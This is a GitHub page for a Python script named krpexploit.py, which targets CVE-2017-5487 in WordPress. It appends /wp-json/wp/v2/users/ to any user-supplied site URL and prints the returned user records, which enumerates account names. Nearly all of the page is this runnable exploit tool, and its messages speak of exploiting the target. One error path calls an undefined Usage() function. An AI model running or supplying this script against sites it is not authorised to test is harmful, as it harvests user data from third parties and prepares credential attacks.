-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathkrpexploit.py
84 lines (79 loc) · 3.34 KB
/
krpexploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/python
#===============================================================
# WordPress Website User Information Disclosure using REST API
# CVE-2017-5487 Vulnerability Scanner
# Author: Kailas PATIL
# Email: patilkr80 [AT] gmail [DOT] com
#===============================================================
import sys, getopt
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
import json
import datetime
def main(argv):
if len(sys.argv) < 2:
print ('The required option is: --url or -u')
print ('Please use -h for the list of available options.')
sys.exit(1)
websiteurl = ''
apistring = '/wp-json/wp/v2/users/'
payload = ''
try:
opts, args = getopt.getopt(sys.argv[1:],"hu:",["url="])
for opt, arg in opts:
if opt == '-h':
print ('_______________________________________________________________')
print ('WordPress Website User Information Disclosure using REST API')
print (' CVE-2017-5487 Vulnerability Scanner')
print ('_______________________________________________________________')
print (' Author: Kailas PATIL')
print (' Email: patilkr80 [AT] gmail [DOT] com')
print ('_______________________________________________________________')
print (' Usage: python3 krpexploit.py [options]')
print (' -h Display the simple help and exit')
print (' --url <URL> The URL of the WordPress website to scan ')
print (' -u <URL> The URL of the WordPress website to scan ')
print ('_______________________________________________________________')
print (' Example:')
print (' python3 krpexploit.py --url http://example.com')
print ('_______________________________________________________________')
sys.exit()
elif opt in ("-u", "--url"):
websiteurl = arg
print ('===============================================================')
print ('WordPress Website User Information Disclosure using REST API')
print (' CVE-2017-5487 Vulnerability Scanner')
print (' Author: Kailas PATIL')
print (' Email: patilkr80 [AT] gmail [DOT] com')
print ('_______________________________________________________________')
print (' WebsiteURL Provided by the User to Scan: ', websiteurl)
payload = websiteurl+apistring
print (' Payload URL is: ', payload)
now = datetime.datetime.now()
print (" Scan date and time : " + now.strftime("%Y-%m-%d %H:%M:%S"))
print ('===============================================================')
req = Request(payload)
try:
response = urlopen(req)
except HTTPError as e:
print(' HTTP Error Code is: ', e.code)
print(' Error !!! HTTP Error. Unsucessful to exploit the given web URL.')
except URLError as e:
print (' Error!!! URL Error. Unsuccessful to exploit the given website.')
print('URLError: {}'.format(e.reason))
else:
the_page = response.read()
try:
data = json.loads(the_page)
print (json.dumps(data, indent=2, sort_keys=True))
except ValueError as e:
print(' JSON Error: {}'.format(e))
print (' Unsuccessful to exploit the given website.')
print ('_____________________________________________________')
except getopt.GetoptError:
print ('krpexploit.py -u <URL>')
Usage()
print ('_____________________________________________________')
sys.exit(2)
if __name__ == "__main__":
main(sys.argv[1:])